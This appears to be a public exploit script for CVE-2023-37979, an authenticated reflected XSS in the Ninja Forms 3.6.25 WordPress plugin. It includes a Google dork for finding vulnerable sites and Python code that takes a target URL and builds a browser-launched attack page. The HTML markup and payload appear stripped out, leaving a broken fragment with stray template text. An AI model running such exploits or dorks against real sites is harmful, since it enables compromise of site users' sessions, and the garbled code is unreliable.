{CVE_NAME}

# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated) # Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt # Date: 2023-07-27 # Exploit Author: Mehran Seifalinia # Vendor Homepage: https://ninjaforms.com/ # Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip # Version: 3.6.25 # Tested on: Windows 10 # CVE: CVE-2023-37979 from requests import get from sys import argv from os import getcwd import webbrowser from time import sleep # Values: url = argv[-1] if url[-1] == "/": url = url.rstrip("/") # Constants CVE_NAME = "CVE-2023-37979" VULNERABLE_VERSION = "3.6.25" # HTML template HTML_TEMPLATE = f""" {CVE_NAME}

Ninja-forms reflected XSS ({CVE_NAME})
Created by Mehran Seifalinia

After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.